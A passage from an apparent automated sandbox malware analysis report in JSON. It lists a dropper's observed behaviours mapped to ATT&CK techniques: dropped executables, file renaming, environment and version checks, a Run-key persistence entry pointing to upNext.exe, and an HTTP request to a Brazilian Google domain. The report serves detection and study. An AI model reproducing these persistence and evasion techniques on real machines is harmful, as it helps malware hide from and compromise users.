\"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\"; Value: \"\")\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\"; Key: \"CATEGORY\"; Value: \"\")\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\"; Key: \"NAME\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-53", "type": 8, "relevance": 1, "name": "Drops temp files", "description": "\"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.tmp\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\" - Location: [C:\\4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.tmp]\n \"upNext.tmp\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.tmp\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [C:\\4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.tmp]- [targetUID: 00000000-00004224]\n \"upNext.tmp\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"dism.log\" has type \"Unicode text UTF-8 (with BOM) text with very long lines (312) with CRLF line terminators\"- [targetUID: N/A]\n \"DISMHOST.EXE.67A482A2.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"upNext.exe.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"upNext.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\upNext.exe]- [targetUID: 00000000-00004224]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-162", "type": 6, "relevance": 1, "name": "Renames files", "description": "\"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" renamed original file\"C:\\4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" to \"C:\\4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.del\"\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" renamed original file\"C:\\4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.tmp\" to \"C:\\4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\"", "origin": "API Call", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"LoadResource with parameter {'hModule': '262144', 'hResInfo': '1263288'}\" (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"LoadResource with parameter {'hModule': '262144', 'hResInfo': '1262872'}\" (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"LoadResource with parameter {'hModule': '262144', 'hResInfo': '1263304'}\" (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"LoadResource with parameter {'hModule': '262144', 'hResInfo': '1262888'}\" (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"LoadResource with parameter {'hModule': '262144', 'hResInfo': '1263320'}\" (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"LoadResource with parameter {'hModule': '262144', 'hResInfo': '1262904'}\" (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"LoadResource with parameter {'hModule': '262144', 'hResInfo': '1263336'}\" (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"LoadResource with parameter {'hModule': '262144', 'hResInfo': '1262920'}\" (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"LoadResource with parameter {'hModule': '262144', 'hResInfo': '1263352'}\" (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"LoadResource with parameter {'hModule': '262144', 'hResInfo': '1262936'}\" (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"LoadResource with parameter {'hModule': '262144', 'hResInfo': '1263384'}\" (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"LoadResource with parameter {'hModule': '262144', 'hResInfo': '1262968'}\" (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"LoadResource with parameter {'hModule': '262144', 'hResInfo': '1263368'}\" (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"LoadResource with parameter {'hModule': '262144', 'hResInfo': '1262952'}\" (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"LoadResource with parameter {'hModule': '262144', 'hResInfo': '1263400'}\" (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"LoadResource with parameter {'hModule': '262144', 'hResInfo': '1262984'}\" (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"LoadResource with parameter {'hModule': '262144', 'hResInfo': '1263000'}\" (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"LoadResource with parameter {'hModule': '1999437824', 'hResInfo': '5244400'}\" (UID: 00000000-00004224)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "static-5", "relevance": 10, "name": "PE file contains zero-size sections", "description": "Raw size of \"BSS\" is zero\n Raw size of \".tls\" is zero", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000028ff230058260400d8fe2300100000008cd3480090643900e07e55010000000090d348001000000038d611006d000000bc980400043d0400160000009640040016000000ee40040001940400cad9040028ff2300b540040034ff230090d3480038d611006d0000001600000019e00400 (UID: 00000000-00004224)\n \"upNext.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000028ff230058260400d8fe2300100000008cd3460090643700e07e43010000000090d346001000000038d611006d000000bc980400043d0400160000009640040016000000ee40040001940400cad9040028ff2300b540040034ff230090d3460038d611006d0000001600000019e00400 (UID: 00000000-00004788)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetLocaleInfoA\" with parameter \"1033\" - (UID: 00000000-00004224)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-138", "type": 3, "relevance": 1, "name": "Queries for Borland Delphi related registry entry", "description": "\"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\BORLAND\\DELPHI\\LOCALES\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000001400000038fe23000d00000000005501d87e550138fe2300145c8577435c85772da9a1777b270000ec01550100005501500155013f000000ff07000050015501e23c00de000000002700390014000000006d290050015501c86f2900e07e55012000000021000000000000000d000000b86c2900d86d2900a8822c00807129000000000021000021c4005501dcfe230095e18177054b0700000000007f0000009a2a857721000021c400550101000000000000000200000008000000e07e5501e07e5501db7e55010000000008fe23000000550154fe230168fd230002000000 (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004224)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"IsWow64Process\" with parameter \"4224\" - (UID: 00000000-00004224)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-149", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve default language settings", "description": "\"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004224)", "origin": "API Call", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00004224)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-39", "type": 1, "relevance": 10, "name": "Makes a code branch decision directly after an API that is environment aware", "description": "Found API call GetVersion@kernel32.dll directly followed by \"cmp ax, 0004h\" and \"jc 00080776h\" at 12460-4291-000805C0\n Found API call GetVersion@KERNEL32.DLL directly followed by \"cmp ax, 0004h\" and \"jc 00080776h\" at 00000000-00004224-31662-3651-000805C0\n Found API call GetVersion@KERNEL32.DLL directly followed by \"cmp ax, 0004h\" and \"setnb byte ptr [0011DB38h]\" at 00000000-00004224-31662-3916-0009588C", "origin": "Hybrid Analysis Technology", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"FindFirstFileA\" with parameter C:\\4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.old (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"FindFirstFileA\" with parameter C:\\4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.del (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"FindFirstFileA\" with parameter C:\\4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.tmp (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"FindFirstFileA\" with parameter C:\\4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe (UID: 00000000-00004224)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-105", "type": 6, "relevance": 3, "name": "Calls an API possibly used to take screenshots", "description": "\"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"570493113\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1040253496\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"570493113\"\n \"cx\": \"0\"\n \"cy\": \"25\"}", "origin": "API Call", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-62", "type": 7, "relevance": 1, "name": "Communicates with HTTP webserver (GET/POST requests)", "description": "Found http requests in header \"GET /\"", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "network-60", "type": 7, "relevance": 1, "name": "HTTP requests contain Base64 strings", "description": "Contains base64 string in header \"Language\" in header \"GET / HTTP/1.1Accept: */*Accept-Language: pt-br;pt;en-us;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Cache-Control: no-cache, must-revalidateHost: www.google.com.brAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7Content-Type: application/x-www-form-urlencodedContent-Length: 0Connection: close\"\n Contains base64 string in header \"MSIE\" in header \"GET / HTTP/1.1Accept: */*Accept-Language: pt-br;pt;en-us;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Cache-Control: no-cache, must-revalidateHost: www.google.com.brAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7Content-Type: application/x-www-form-urlencodedContent-Length: 0Connection: close\"\n Contains base64 string in header \"must\" in header \"GET / HTTP/1.1Accept: */*Accept-Language: pt-br;pt;en-us;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Cache-Control: no-cache, must-revalidateHost: www.google.com.brAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7Content-Type: application/x-www-form-urlencodedContent-Length: 0Connection: close\"\n Contains base64 string in header \"brAccept\" in header \"GET / HTTP/1.1Accept: */*Accept-Language: pt-br;pt;en-us;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Cache-Control: no-cache, must-revalidateHost: www.google.com.brAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7Content-Type: application/x-www-form-urlencodedContent-Length: 0Connection: close\"\n Contains base64 string in header \"8859\" in header \"GET / HTTP/1.1Accept: */*Accept-Language: pt-br;pt;en-us;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Cache-Control: no-cache, must-revalidateHost: www.google.com.brAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7Content-Type: application/x-www-form-urlencodedContent-Length: 0Connection: close\"\n Contains base64 string in header \"7Content\" in header \"GET / HTTP/1.1Accept: */*Accept-Language: pt-br;pt;en-us;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Cache-Control: no-cache, must-revalidateHost: www.google.com.brAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7Content-Type: application/x-www-form-urlencodedContent-Length: 0Connection: close\"\n Contains base64 string in header \"Type\" in header \"GET / HTTP/1.1Accept: */*Accept-Language: pt-br;pt;en-us;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Cache-Control: no-cache, must-revalidateHost: www.google.com.brAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7Content-Type: application/x-www-form-urlencodedContent-Length: 0Connection: close\"\n Contains base64 string in header \"form\" in header \"GET / HTTP/1.1Accept: */*Accept-Language: pt-br;pt;en-us;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Cache-Control: no-cache, must-revalidateHost: www.google.com.brAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7Content-Type: application/x-www-form-urlencodedContent-Length: 0Connection: close\"", "origin": "Network Traffic", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"NAMESPACE_CALLOUT\"; Value: \"\")\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"SERIAL_ACCESS_NUM\"; Value: \"\")\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NEXT_CATALOG_ENTRY_ID\"; Value: \"\")\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NUM_CATALOG_ENTRIES\"; Value: \"\")\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000001\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000002\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000003\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000005\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000006\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000007\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000008\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000009\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-67", "type": 3, "relevance": 10, "name": "Creates or modifies windows services", "description": "\"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\")", "origin": "Registry Access", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "registry-0", "type": 3, "relevance": 8, "name": "Modifies auto-execute functionality by setting/creating a value in the registry", "description": "\"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"MSNCORE\"; Value: \"%LOCALAPPDATA%\\upNext.exe --i\")", "origin": "Registry Access", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" wrote 24912 bytes starting with PE header signature to file \"C:\\4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.tmp\": 4d5a50000200000004000f00ffff0000ff0000000000000040001a0000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 ...\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" wrote 24912 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\upNext.exe\": 4d5a50000200000004000f00ffff0000ff0000000000000040001a0000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.tmp\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [C:\\4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.tmp]- [targetUID: 00000000-00004224]\n \"upNext.tmp\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"DISMHOST.EXE.67A482A2.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"upNext.exe.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"upNext.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\upNext.exe]- [targetUID: 00000000-00004224]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462\" has section name CODE with entropy \"6.40167771175\"\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462\" has section name .reloc with entropy \"6.75219683931\"\n 